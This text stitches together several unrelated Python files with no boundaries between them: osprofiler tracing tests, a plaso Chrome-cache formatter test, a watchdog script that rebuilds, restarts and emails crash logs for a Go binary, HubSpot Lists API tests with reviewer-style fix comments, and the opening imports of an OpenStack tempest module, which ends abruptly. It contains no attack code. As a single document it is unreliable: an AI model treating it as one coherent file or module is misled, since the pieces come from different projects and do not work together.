        p.start.assert_called_once_with("name", info="info")

    def test_stop_not_inited(self):
        # stop() must be a harmless no-op when no profiler was initialized.
        profiler.clean()
        profiler.stop()

    def test_stop(self):
        p = profiler.init("secret", base_id="1", parent_id="2")
        p.stop = mock.MagicMock()
        profiler.stop(info="info")
        p.stop.assert_called_once_with(info="info")


class ProfilerTestCase(test.TestCase):
    """Tests for the internal profiler._Profiler class."""

    def test_profiler_get_shorten_id(self):
        # A UUID string is shortened to its last 16 hex digits.
        uuid_id = "4e3e0ec6-2938-40b1-8504-09eb1d4b0dee"
        prof = profiler._Profiler("secret", base_id="1", parent_id="2")
        result = prof.get_shorten_id(uuid_id)
        expected = "850409eb1d4b0dee"
        self.assertEqual(expected, result)

    def test_profiler_get_shorten_id_int(self):
        # An integer id is rendered as lowercase hex (42 -> "2a").
        short_id_int = 42
        prof = profiler._Profiler("secret", base_id="1", parent_id="2")
        result = prof.get_shorten_id(short_id_int)
        expected = "2a"
        self.assertEqual(expected, result)

    def test_profiler_get_base_id(self):
        prof = profiler._Profiler("secret", base_id="1", parent_id="2")
        self.assertEqual(prof.get_base_id(), "1")

    @mock.patch("osprofiler.profiler.uuidutils.generate_uuid")
    def test_profiler_get_parent_id(self, mock_generate_uuid):
        mock_generate_uuid.return_value = "42"
        prof = profiler._Profiler("secret", base_id="1", parent_id="2")
        prof.start("test")
        self.assertEqual(prof.get_parent_id(), "2")

    @mock.patch("osprofiler.profiler.uuidutils.generate_uuid")
    def test_profiler_get_base_id_unset_case(self, mock_generate_uuid):
        # Without an explicit base_id both ids fall back to a generated uuid.
        mock_generate_uuid.return_value = "42"
        prof = profiler._Profiler("secret")
        self.assertEqual(prof.get_base_id(), "42")
        self.assertEqual(prof.get_parent_id(), "42")

    @mock.patch("osprofiler.profiler.uuidutils.generate_uuid")
    def test_profiler_get_id(self, mock_generate_uuid):
        mock_generate_uuid.return_value = "43"
        prof = profiler._Profiler("secret")
        prof.start("test")
        self.assertEqual(prof.get_id(), "43")

    @mock.patch("osprofiler.profiler.datetime")
    @mock.patch("osprofiler.profiler.uuidutils.generate_uuid")
    @mock.patch("osprofiler.profiler.notifier.notify")
    def test_profiler_start(self, mock_notify, mock_generate_uuid,
                            mock_datetime):
        # start() must emit exactly one "<name>-start" notification payload.
        mock_generate_uuid.return_value = "44"
        now = datetime.datetime.utcnow()
        mock_datetime.datetime.utcnow.return_value = now

        info = {"some": "info"}
        payload = {
            "name": "test-start",
            "base_id": "1",
            "parent_id": "2",
            "trace_id": "44",
            "info": info,
            "timestamp": now.strftime("%Y-%m-%dT%H:%M:%S.%f"),
        }

        prof = profiler._Profiler("secret", base_id="1", parent_id="2")
        prof.start("test", info=info)

        mock_notify.assert_called_once_with(payload)

    @mock.patch("osprofiler.profiler.datetime")
    @mock.patch("osprofiler.profiler.notifier.notify")
    def test_profiler_stop(self, mock_notify, mock_datetime):
        # stop() pops the pushed name/trace id and emits "<name>-stop".
        now = datetime.datetime.utcnow()
        mock_datetime.datetime.utcnow.return_value = now
        prof = profiler._Profiler("secret", base_id="1", parent_id="2")
        prof._trace_stack.append("44")
        prof._name.append("abc")

        info = {"some": "info"}
        prof.stop(info=info)

        payload = {
            "name": "abc-stop",
            "base_id": "1",
            "parent_id": "2",
            "trace_id": "44",
            "info": info,
            "timestamp": now.strftime("%Y-%m-%dT%H:%M:%S.%f"),
        }

        mock_notify.assert_called_once_with(payload)
        self.assertEqual(len(prof._name), 0)
        self.assertEqual(prof._trace_stack, collections.deque(["1", "2"]))

    def test_profiler_hmac(self):
        hmac = "secret"
        prof = profiler._Profiler(hmac, base_id="1", parent_id="2")
        self.assertEqual(hmac, prof.hmac_key)


class WithTraceTestCase(test.TestCase):
    """Tests for the profiler.Trace context manager."""

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_with_trace(self, mock_start, mock_stop):
        # Nested Trace blocks must produce matching start/stop pairs.

        with profiler.Trace("a", info="a1"):
            mock_start.assert_called_once_with("a", info="a1")
            mock_start.reset_mock()
            with profiler.Trace("b", info="b1"):
                mock_start.assert_called_once_with("b", info="b1")
            mock_stop.assert_called_once_with()
            mock_stop.reset_mock()
        mock_stop.assert_called_once_with()

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_with_trace_etype(self, mock_start, mock_stop):
        # An exception inside the block must still stop the trace, and the
        # exception type/message must be attached to the stop info.

        def foo():
            with profiler.Trace("foo"):
                raise ValueError("bar")

        self.assertRaises(ValueError, foo)
        mock_start.assert_called_once_with("foo", info=None)
        mock_stop.assert_called_once_with(info={
            "etype": "ValueError",
            "message": "bar"
        })


@profiler.trace("function", info={"info": "some_info"})
def traced_func(i):
    """Fixture: traced function that echoes its argument."""
    return i


@profiler.trace("hide_args", hide_args=True)
def trace_hide_args_func(a, i=10):
    """Fixture: traced with argument capture disabled."""
    return (a, i)


# NOTE(review): this module-level test_* name would be collected by pytest
# and always raises -- confirm the runner only collects TestCase classes.
@profiler.trace("foo", hide_args=True)
def test_fn_exc():
    """Fixture: traced function that always raises ValueError."""
    raise ValueError()


@profiler.trace("hide_result", hide_result=False)
def trace_with_result_func(a, i=10):
    """Fixture: traced with result capture enabled (hide_result=False)."""
    return (a, i)


class TraceDecoratorTestCase(test.TestCase):
    """Tests for the @profiler.trace function decorator."""

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_duplicate_trace_disallow(self, mock_start, mock_stop):
        # Re-decorating an already traced function must raise when
        # allow_multiple_trace is False.

        @profiler.trace("test")
        def trace_me():
            pass

        self.assertRaises(
            ValueError,
            profiler.trace("test-again", allow_multiple_trace=False),
            trace_me)

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_with_args(self, mock_start, mock_stop):
        # Default decoration records the call arguments in the start info.
        self.assertEqual(1, traced_func(1))
        expected_info = {
            "info": "some_info",
            "function": {
                "name": "osprofiler.tests.unit.test_profiler.traced_func",
                "args": str((1,)),
                "kwargs": str({})
            }
        }
        mock_start.assert_called_once_with("function", info=expected_info)
        mock_stop.assert_called_once_with()

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_without_args(self, mock_start, mock_stop):
        # hide_args=True must omit args/kwargs from the start info.
        self.assertEqual((1, 2), trace_hide_args_func(1, i=2))
        expected_info = {
            "function": {
                "name": "osprofiler.tests.unit.test_profiler"
                        ".trace_hide_args_func"
            }
        }
        mock_start.assert_called_once_with("hide_args", info=expected_info)
        mock_stop.assert_called_once_with()

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_with_exception(self, mock_start, mock_stop):
        # The raised exception's type and message go into the stop info.

        self.assertRaises(ValueError, test_fn_exc)
        expected_info = {
            "function": {
                "name": "osprofiler.tests.unit.test_profiler.test_fn_exc"
            }
        }
        expected_stop_info = {"etype": "ValueError", "message": ""}
        mock_start.assert_called_once_with("foo", info=expected_info)
        mock_stop.assert_called_once_with(info=expected_stop_info)

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_with_result(self, mock_start, mock_stop):
        # hide_result=False must attach the return value to the stop info.
        self.assertEqual((1, 2), trace_with_result_func(1, i=2))
        start_info = {
            "function": {
                "name": "osprofiler.tests.unit.test_profiler"
                        ".trace_with_result_func",
                "args": str((1,)),
                "kwargs": str({"i": 2})
            }
        }

        stop_info = {
            "function": {
                "result": str((1, 2))
            }
        }
        mock_start.assert_called_once_with("hide_result", info=start_info)
        mock_stop.assert_called_once_with(info=stop_info)


class FakeTracedCls(object):
    """Plain helper class whose methods get wrapped by the tracing decorators."""

    def method1(self, a, b, c=10):
        """Return the sum of the three arguments."""
        total = a + b
        return total + c

    def method2(self, d, e):
        """Return the difference d - e."""
        difference = d - e
        return difference

    def method3(self, g=10, h=20):
        """Return the product g * h."""
        product = g * h
        return product

    def _method(self, i):
        """Private helper: echo the argument."""
        return i


# Fixture classes: the same FakeTracedCls wrapped with different trace_cls
# configurations, exercised by TraceClsDecoratorTestCase.


@profiler.trace_cls("rpc", info={"a": 10})
class FakeTraceClassWithInfo(FakeTracedCls):
    """Traced with extra static info attached to every event."""
    pass


@profiler.trace_cls("a", info={"b": 20}, hide_args=True)
class FakeTraceClassHideArgs(FakeTracedCls):
    """Traced without recording call arguments."""
    pass


@profiler.trace_cls("rpc", trace_private=True)
class FakeTracePrivate(FakeTracedCls):
    """Traced including _private methods."""
    pass


class FakeTraceStaticMethodBase(FakeTracedCls):
    @staticmethod
    def static_method(arg):
        """Echo the argument (no instance state)."""
        return arg


@profiler.trace_cls("rpc", trace_static_methods=True)
class FakeTraceStaticMethod(FakeTraceStaticMethodBase):
    """Traced with static-method tracing enabled."""
    pass


@profiler.trace_cls("rpc")
class FakeTraceStaticMethodSkip(FakeTraceStaticMethodBase):
    """Traced with default options: static methods are not traced."""
    pass


class FakeTraceClassMethodBase(FakeTracedCls):
    @classmethod
    def class_method(cls, arg):
        """Echo the argument (classmethod)."""
        return arg


@profiler.trace_cls("rpc")
class FakeTraceClassMethodSkip(FakeTraceClassMethodBase):
    """Traced with default options: class methods are not traced."""
    pass


def py3_info(info):
    """Return a deep copy of *info* with the traced class name normalized.

    Any "FakeTrace*" component of info["function"]["name"] is replaced by
    "FakeTracedCls", producing the py3 spelling of the qualified name
    (see possible_mock_calls, which accepts both variants).
    """
    normalized = copy.deepcopy(info)
    func = normalized["function"]
    func["name"] = re.sub("FakeTrace[^.]*", "FakeTracedCls", func["name"])
    return normalized


def possible_mock_calls(name, info):
    """Return the two acceptable start() calls: py2 and py3 name spellings."""
    # NOTE(boris-42): py33 I hate you.
    return [mock.call(name, info=info), mock.call(name, info=py3_info(info))]


class TraceClsDecoratorTestCase(test.TestCase):
    """Tests for the @profiler.trace_cls class decorator."""

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_args(self, mock_start, mock_stop):
        # Positional arguments are captured in the start info.
        fake_cls = FakeTraceClassWithInfo()
        self.assertEqual(30, fake_cls.method1(5, 15))
        expected_info = {
            "a": 10,
            "function": {
                "name": ("osprofiler.tests.unit.test_profiler"
                         ".FakeTraceClassWithInfo.method1"),
                "args": str((fake_cls, 5, 15)),
                "kwargs": str({})
            }
        }
        self.assertEqual(1, len(mock_start.call_args_list))
        self.assertIn(mock_start.call_args_list[0],
                      possible_mock_calls("rpc", expected_info))
        mock_stop.assert_called_once_with()

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_kwargs(self, mock_start, mock_stop):
        # Keyword arguments are captured in the start info.
        fake_cls = FakeTraceClassWithInfo()
        self.assertEqual(50, fake_cls.method3(g=5, h=10))
        expected_info = {
            "a": 10,
            "function": {
                "name": ("osprofiler.tests.unit.test_profiler"
                         ".FakeTraceClassWithInfo.method3"),
                "args": str((fake_cls,)),
                "kwargs": str({"g": 5, "h": 10})
            }
        }
        self.assertEqual(1, len(mock_start.call_args_list))
        self.assertIn(mock_start.call_args_list[0],
                      possible_mock_calls("rpc", expected_info))
        mock_stop.assert_called_once_with()

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_without_private(self, mock_start, mock_stop):
        # By default _private methods are not traced.
        fake_cls = FakeTraceClassHideArgs()
        self.assertEqual(10, fake_cls._method(10))
        self.assertFalse(mock_start.called)
        self.assertFalse(mock_stop.called)

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_without_args(self, mock_start, mock_stop):
        # hide_args=True must omit args/kwargs from the start info.
        fake_cls = FakeTraceClassHideArgs()
        self.assertEqual(40, fake_cls.method1(5, 15, c=20))
        expected_info = {
            "b": 20,
            "function": {
                "name": ("osprofiler.tests.unit.test_profiler"
                         ".FakeTraceClassHideArgs.method1"),
            }
        }

        self.assertEqual(1, len(mock_start.call_args_list))
        self.assertIn(mock_start.call_args_list[0],
                      possible_mock_calls("a", expected_info))
        mock_stop.assert_called_once_with()

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_private_methods(self, mock_start, mock_stop):
        # trace_private=True also traces _private methods.
        fake_cls = FakeTracePrivate()
        self.assertEqual(5, fake_cls._method(5))

        expected_info = {
            "function": {
                "name": ("osprofiler.tests.unit.test_profiler"
                         ".FakeTracePrivate._method"),
                "args": str((fake_cls, 5)),
                "kwargs": str({})
            }
        }

        self.assertEqual(1, len(mock_start.call_args_list))
        self.assertIn(mock_start.call_args_list[0],
                      possible_mock_calls("rpc", expected_info))
        mock_stop.assert_called_once_with()

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    @test.testcase.skip(
        "Static method tracing was disabled due the bug. This test should be "
        "skipped until we find the way to address it.")
    def test_static(self, mock_start, mock_stop):
        fake_cls = FakeTraceStaticMethod()

        self.assertEqual(25, fake_cls.static_method(25))

        expected_info = {
            "function": {
                # fixme(boris-42): Static methods are treated differently in
                #                  Python 2.x and Python 3.x. So in PY2 we
                #                  expect to see method4 because method is
                #                  static and doesn't have reference to class
                #                  - and FakeTraceStatic.method4 in PY3
                "name":
                    "osprofiler.tests.unit.test_profiler"
                    ".method4" if six.PY2 else
                    "osprofiler.tests.unit.test_profiler.FakeTraceStatic"
                    ".method4",
                "args": str((25,)),
                "kwargs": str({})
            }
        }

        self.assertEqual(1, len(mock_start.call_args_list))
        self.assertIn(mock_start.call_args_list[0],
                      possible_mock_calls("rpc", expected_info))
        mock_stop.assert_called_once_with()

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_static_method_skip(self, mock_start, mock_stop):
        # Static methods are not traced unless explicitly enabled.
        self.assertEqual(25, FakeTraceStaticMethodSkip.static_method(25))
        self.assertFalse(mock_start.called)
        self.assertFalse(mock_stop.called)

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_class_method_skip(self, mock_start, mock_stop):
        # Class methods are never traced by trace_cls.
        self.assertEqual("foo", FakeTraceClassMethodSkip.class_method("foo"))
        self.assertFalse(mock_start.called)
        self.assertFalse(mock_stop.called)


@six.add_metaclass(profiler.TracedMeta)
class FakeTraceWithMetaclassBase(object):
    """Fixture traced via TracedMeta; __trace_args__ configures the tracer."""
    __trace_args__ = {"name": "rpc",
                      "info": {"a": 10}}

    def method1(self, a, b, c=10):
        return a + b + c

    def method2(self, d, e):
        return d - e

    def method3(self, g=10, h=20):
        return g * h

    def _method(self, i):
        return i


class FakeTraceDummy(FakeTraceWithMetaclassBase):
    """Subclass fixture inheriting the metaclass tracing configuration."""
    def method4(self, j):
        return j


class FakeTraceWithMetaclassHideArgs(FakeTraceWithMetaclassBase):
    """Fixture overriding __trace_args__ to hide call arguments."""
    __trace_args__ = {"name": "a",
                      "info": {"b": 20},
                      "hide_args": True}

    def method5(self, k, l):
        return k + l


class FakeTraceWithMetaclassPrivate(FakeTraceWithMetaclassBase):
    """Fixture overriding __trace_args__ to also trace _private methods."""
    __trace_args__ = {"name": "rpc",
                      "trace_private": True}

    def _new_private_method(self, m):
        return 2 * m


class TraceWithMetaclassTestCase(test.TestCase):
    """Tests for tracing configured through the TracedMeta metaclass."""

    def test_no_name_exception(self):
        # A class under TracedMeta without __trace_args__["name"] must fail.
        def define_class_with_no_name():
            @six.add_metaclass(profiler.TracedMeta)
            class FakeTraceWithMetaclassNoName(FakeTracedCls):
                pass
        # Bug fix: the original passed an extra argument
        # (assertRaises(..., define_class_with_no_name, 1)), so the callable
        # raised TypeError for wrong arity and the test passed even if
        # TracedMeta never validated the missing name.  Call it with no
        # arguments so the TypeError must come from TracedMeta itself.
        self.assertRaises(TypeError, define_class_with_no_name)

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_args(self, mock_start, mock_stop):
        # Positional arguments are captured in the start info.
        fake_cls = FakeTraceWithMetaclassBase()
        self.assertEqual(30, fake_cls.method1(5, 15))
        expected_info = {
            "a": 10,
            "function": {
                "name": ("osprofiler.tests.unit.test_profiler"
                         ".FakeTraceWithMetaclassBase.method1"),
                "args": str((fake_cls, 5, 15)),
                "kwargs": str({})
            }
        }
        self.assertEqual(1, len(mock_start.call_args_list))
        self.assertIn(mock_start.call_args_list[0],
                      possible_mock_calls("rpc", expected_info))
        mock_stop.assert_called_once_with()

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_kwargs(self, mock_start, mock_stop):
        # Keyword arguments are captured in the start info.
        fake_cls = FakeTraceWithMetaclassBase()
        self.assertEqual(50, fake_cls.method3(g=5, h=10))
        expected_info = {
            "a": 10,
            "function": {
                "name": ("osprofiler.tests.unit.test_profiler"
                         ".FakeTraceWithMetaclassBase.method3"),
                "args": str((fake_cls,)),
                "kwargs": str({"g": 5, "h": 10})
            }
        }
        self.assertEqual(1, len(mock_start.call_args_list))
        self.assertIn(mock_start.call_args_list[0],
                      possible_mock_calls("rpc", expected_info))
        mock_stop.assert_called_once_with()

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_without_private(self, mock_start, mock_stop):
        # _private methods are not traced unless trace_private is set.
        fake_cls = FakeTraceWithMetaclassHideArgs()
        self.assertEqual(10, fake_cls._method(10))
        self.assertFalse(mock_start.called)
        self.assertFalse(mock_stop.called)

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_without_args(self, mock_start, mock_stop):
        # hide_args=True must omit args/kwargs from the start info.
        fake_cls = FakeTraceWithMetaclassHideArgs()
        self.assertEqual(20, fake_cls.method5(5, 15))
        expected_info = {
            "b": 20,
            "function": {
                "name": ("osprofiler.tests.unit.test_profiler"
                         ".FakeTraceWithMetaclassHideArgs.method5")
            }
        }

        self.assertEqual(1, len(mock_start.call_args_list))
        self.assertIn(mock_start.call_args_list[0],
                      possible_mock_calls("a", expected_info))
        mock_stop.assert_called_once_with()

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_private_methods(self, mock_start, mock_stop):
        # trace_private=True also traces _private methods.
        fake_cls = FakeTraceWithMetaclassPrivate()
        self.assertEqual(10, fake_cls._new_private_method(5))

        expected_info = {
            "function": {
                "name": ("osprofiler.tests.unit.test_profiler"
                         ".FakeTraceWithMetaclassPrivate._new_private_method"),
                "args": str((fake_cls, 5)),
                "kwargs": str({})
            }
        }

        self.assertEqual(1, len(mock_start.call_args_list))
        self.assertIn(mock_start.call_args_list[0],
                      possible_mock_calls("rpc", expected_info))
        mock_stop.assert_called_once_with()

#!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tests for the Google Chrome Cache files event formatter."""

import unittest

from plaso.formatters import chrome_cache

from tests.formatters import test_lib


class ChromeCacheEntryEventFormatterTest(test_lib.EventFormatterTestCase):
  """Tests for the Chrome Cache entry event formatter."""

  def testInitialization(self):
    """Tests the initialization."""
    self.assertIsNotNone(chrome_cache.ChromeCacheEntryEventFormatter())

  def testGetFormatStringAttributeNames(self):
    """Tests the GetFormatStringAttributeNames function."""
    formatter = chrome_cache.ChromeCacheEntryEventFormatter()

    # The formatter exposes exactly one message attribute.
    self._TestGetFormatStringAttributeNames(formatter, [u'original_url'])

  # TODO: add test for GetMessages.


# Allow running this test module directly.
if __name__ == '__main__':
  unittest.main()

import os
import subprocess

# Watchdog script: rebuild the binary, and (re)start it when the build
# produced a new binary or the process is no longer running.
name = "gobuildmaster"

# Checksum of the binary before rebuilding, to detect changes.
# (Original first line was the garbled token "macimport os".)
current_hash = ""
for line in os.popen("md5sum " + name).readlines():
    current_hash = line.split(' ')[0]

# Move the old version over
for line in os.popen('cp ' + name + ' old' + name).readlines():
    print(line.strip())

# Rebuild
for line in os.popen('go build').readlines():
    print(line.strip())

size_1 = os.path.getsize('./old' + name)
size_2 = os.path.getsize('./' + name)

# Determine whether the binary is currently running.
lines = os.popen('ps -ef | grep ' + name).readlines()
running = False
for line in lines:
    if "./" + name in line:
        running = True

# Checksum after the rebuild.
new_hash = ""
for line in os.popen("md5sum " + name).readlines():
    new_hash = line.split(' ')[0]

# Restart when the binary changed (size or hash differs) or is not running.
if size_1 != size_2 or new_hash != current_hash or not running:
    if not running:
        # Mail the captured output as a crash report before restarting.
        for line in os.popen('cat out.txt | mail -E -s "Crash Report ' + name + '" brotherlogic@gmail.com').readlines():
            pass
    # Truncate the log, stop any stale process, then launch the new binary.
    for line in os.popen('echo "" > out.txt').readlines():
        pass
    for line in os.popen('killall ' + name).readlines():
        pass
    subprocess.Popen(['./' + name])

import unittest2
import helper
import simplejson as json
from nose.plugins.attrib import attr

PORTAL_ID = 62515

class ListsClientTest(unittest2.TestCase):
    """
    Unit tests for the HubSpot List API Python wrapper (hapipy) client.

    This file contains some unittest tests for the List API.

    Questions, comments, etc: http://developers.hubspot.com
    """

    def setUp(self):
        # NOTE(review): ListsClient must be importable in this module (e.g.
        # `from hapi.lists import ListsClient`) -- confirm the module's
        # imports; the original file never imported it.
        self.client = ListsClient(**helper.get_options())

    def tearDown(self):
        pass

    def _create_dummy_list(self, name='test_list', dynamic=False):
        """Create a list via the API and return the creation response.

        Serializes the payload once per call so each test gets fresh JSON
        (the original tests tried to mutate an already-serialized string).
        """
        dummy_data = json.dumps(dict(
            name=name,
            dynamic=dynamic,
            portalId=PORTAL_ID
        ))
        return self.client.create_list(dummy_data)

    @attr('api')
    def test_get_list(self):
        # create a list to get
        created_list = self._create_dummy_list(name='try_and_get_me')

        # make sure it was created (the original called the non-existent
        # `self.asserTrue` and mixed 'listID'/'listId' key spellings)
        self.assertTrue(created_list['listId'])

        # the id number of the list the test is trying to get
        id_to_get = created_list['listId']

        # try and get it
        received_lists = self.client.get_list(id_to_get)

        # see if the test got the right list
        self.assertEqual(received_lists['lists'][0]['listId'],
                         created_list['listId'])

        print("Got this list: %s" % json.dumps(received_lists['lists'][0]))

        # clean up
        self.client.delete_list(id_to_get)

    @attr('api')
    def test_get_batch_lists(self):
        # holds the ids of the lists being retrieved
        list_ids = []

        # make a list to get
        created_list = self._create_dummy_list(name='first_test_list')

        # make sure it was actually made
        self.assertTrue(created_list['listId'])

        # append the id of the newly made list (the original assigned
        # list_ids[0] on an empty list, an IndexError)
        list_ids.append(created_list['listId'])

        # make a second list with a different name
        created_list = self._create_dummy_list(name='second_test_list')

        # make sure it was actually made
        self.assertTrue(created_list['listId'])

        # put the id number in list_ids
        list_ids.append(created_list['listId'])

        # try and get them
        batch_lists = self.client.get_batch_lists(list_ids)

        # make sure you got as many lists as you were searching for
        self.assertEqual(len(list_ids), len(batch_lists['lists']))

        # clean up
        self.client.delete_list(list_ids[0])
        self.client.delete_list(list_ids[1])

    @attr('api')
    def test_get_lists(self):
        # try and get lists
        received_lists = self.client.get_lists()

        # see if the test got at least one
        if len(received_lists['lists']) == 0:
            self.fail("Unable to retrieve any lists")
        else:
            print("Got these lists %s" % json.dumps(received_lists))

    @attr('api')
    def test_get_static_lists(self):
        # create a static list to get
        created_list = self._create_dummy_list(name='static_test_list')

        # make sure it was actually made
        self.assertTrue(created_list['listId'])

        # this call will return 20 lists if not given another value
        static_lists = self.client.get_static_lists()

        if len(static_lists['lists']) == 0:
            self.fail("Unable to retrieve any static lists")
        else:
            print("Found these static lists: %s" % json.dumps(static_lists))

            # clean up
            self.client.delete_list(created_list['listId'])

    @attr('api')
    def test_get_dynamic_lists(self):
        # make a dynamic list to get
        created_list = self._create_dummy_list(name='test_dynamic_list',
                                               dynamic=True)

        # make sure the dynamic list was made
        self.assertTrue(created_list['listId'])

        dynamic_lists = self.client.get_dynamic_lists()

        if len(dynamic_lists['lists']) == 0:
            self.fail("Unable to retrieve any dynamic lists")
        else:
            print("Found these dynamic lists: %s" % json.dumps(dynamic_lists))

            # clean up
            self.client.delete_list(created_list['listId'])

    @attr('api')
    def test_get_list_contacts(self):
        # make a list whose contacts will be fetched (the original left
        # `which_list` undefined and did not parse)
        created_list = self._create_dummy_list(name='get_my_contacts')
        self.assertTrue(created_list['listId'])

        # the id number of the list you want the contacts of
        which_list = created_list['listId']

        # try and get the contacts
        contacts = self.client.get_list_contacts(which_list)

        # the response must carry a contacts collection
        # (a freshly created list may legitimately have zero members)
        self.assertIsNotNone(contacts['contacts'])

        print("Got these contacts: %s from this list: %s" % (
            json.dumps(contacts), which_list))

        # clean up
        self.client.delete_list(which_list)

    @attr('api')
    def test_get_list_contacts_recent(self):
        # make a list whose recent contacts will be fetched (the original
        # left `which_list` unassigned and did not parse)
        created_list = self._create_dummy_list(name='get_my_recent_contacts')
        self.assertTrue(created_list['listId'])

        # the id number of the list you want the recent contacts of
        which_list = created_list['listId']

        recent_contacts = self.client.get_list_contacts_recent(which_list)

        if len(recent_contacts['lists']) == 0:
            self.fail("Did not find any recent contacts")
        else:
            print("Found these recent contacts: %s"
                  % json.dumps(recent_contacts))

        # clean up
        self.client.delete_list(which_list)

    @attr('api')
    def test_create_list(self):
        # try and make the list
        created_list = self._create_dummy_list(name='test_list')

        # make sure it was created (the original checked the undefined
        # variable `created_lists`)
        if not created_list['listId']:
            self.fail("Did not create the list")
        else:
            print("Created this list: %s" % json.dumps(created_list))

            # clean up
            self.client.delete_list(created_list['listId'])

    @attr('api')
    def test_update_list(self):
        # make a list to update
        created_list = self._create_dummy_list(name='delete_me')

        # make sure it was actually made (the original wrapped an int id in
        # len(), a TypeError)
        self.assertTrue(created_list['listId'])

        # get the id number of the list
        update_list_id = created_list['listId']

        # this is the data updating the list
        # NOTE(review): the original used the key 'list_name' here although
        # lists are created with 'name' -- confirm the field name the API
        # expects.
        update_data = json.dumps(dict(
            name='really_delete_me',
        ))

        # try and do the update
        http_response = self.client.update_list(update_list_id, update_data)

        if http_response >= 400:
            self.fail("Unable to update list!")
        else:
            print("Updated a list!")

        # clean up
        self.client.delete_list(update_list_id)

    @attr('api')
    def test_add_contacts_to_list_from_emails(self):
        # make a list to add contacts to
        created_list = self._create_dummy_list(name='give_me_contact_emails')

        # make sure it was actually made
        self.assertTrue(created_list['listId'])

        # the id number of the list being added to
        which_list = created_list['listId']

        # the emails of the contacts being added
        # NOTE(review): fill in real contact emails for this portal; the
        # original referenced a bare undefined `emails` name.
        emails = json.dumps(dict(
            emails=[]
        ))

        # try and add the contacts
        self.client.add_contacts_to_list_from_emails(which_list, emails)

        # clean up
        self.client.delete_list(which_list)

    @attr('api')
    def test_add_contact_to_list(self):
        # make a list to add a contact to
        created_list = self._create_dummy_list(name='add_a_contact')

        # make sure it was actually made
        self.assertTrue(created_list['listId'])

        # the id number of the list the contact is being added to
        which_list = created_list['listId']

        # the id number of the contact being added to the list
        # NOTE(review): supply a real contact id for this portal; the
        # original left this assignment empty and did not parse.
        which_contact = None
        if which_contact is None:
            self.skipTest("No contact id configured for this test")

        added = self.client.add_contact_to_list(which_list, which_contact)

        if added['updated'] == which_contact:
            print("Succesfully added contact: %s to list: %s"
                  % (which_contact, which_list))

            # if it worked, clean up
            self.client.delete_list(which_list)
        else:
            self.fail("Did not add contact: %s to list: %s"
                      % (which_contact, which_list))

    @attr('api')
    def test_remove_contact_from_list(self):
        # make a list to remove a contact from (the original dict literal
        # was missing a comma after the name entry)
        created_list = self._create_dummy_list(name='remove_this_contact')

        # make sure it was actually made
        self.assertTrue(created_list['listId'])

        # the id number of the list the contact is being deleted from
        which_list = created_list['listId']

        # the id number of the contact being deleted
        # NOTE(review): supply a real contact id for this portal; the
        # original left this assignment empty and did not parse.
        which_contact = None
        if which_contact is None:
            self.skipTest("No contact id configured for this test")

        # put the contact in the list so it can be removed
        added = self.client.add_contact_to_list(which_list, which_contact)

        # make sure it was added
        self.assertTrue(added['updated'])

        # try and remove it
        removed = self.client.remove_contact_from_list(which_list,
                                                       which_contact)

        # check if it was actually removed
        if removed['updated'] == which_contact:
            print("Succesfully removed contact: %s from list: %s"
                  % (which_contact, which_list))

            # clean up
            self.client.delete_list(created_list['listId'])
        else:
            self.fail("Did not remove contact %s from list: %s"
                      % (which_contact, which_list))

    @attr('api')
    def test_delete_list(self):
        # make a list to delete
        created_list = self._create_dummy_list(name='should_be_deleted')

        # check if it was actually made
        self.assertTrue(created_list['listId'])

        # the id number of the list being deleted
        id_to_delete = created_list['listId']

        # try deleting it
        self.client.delete_list(id_to_delete)

        # try and get the list that should have been deleted
        check = self.client.get_list(id_to_delete)

        # check should not have any lists
        self.assertEqual(len(check['lists']), 0)

        print("Sucessfully deleted a test list")

    @attr('api')
    def test_refresh_list(self):
        # make a dynamic list to refresh
        created_list = self._create_dummy_list(name='refresh_this_list',
                                               dynamic=True)

        # make sure it actually made the list
        self.assertTrue(created_list['listId'])

        # do the refresh
        refresh_response = self.client.refresh_list(created_list['listId'])

        # check if it worked
        if refresh_response >= 400:
            self.fail("Failed to refresh list: %s" % json.dumps(created_list))
        else:
            print("Succesfully refreshed list: %s" % json.dumps(created_list))

            # clean up
            self.client.delete_list(created_list['listId'])

# Run the API tests when this module is executed directly.
if __name__ == "__main__":
    unittest2.main()

# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

import json

from six.moves.urllib import parse as urllib
from tempest_lib import exceptions as lib_exc

from tempest.api_schema.response.compute.v2_1 import images as schema
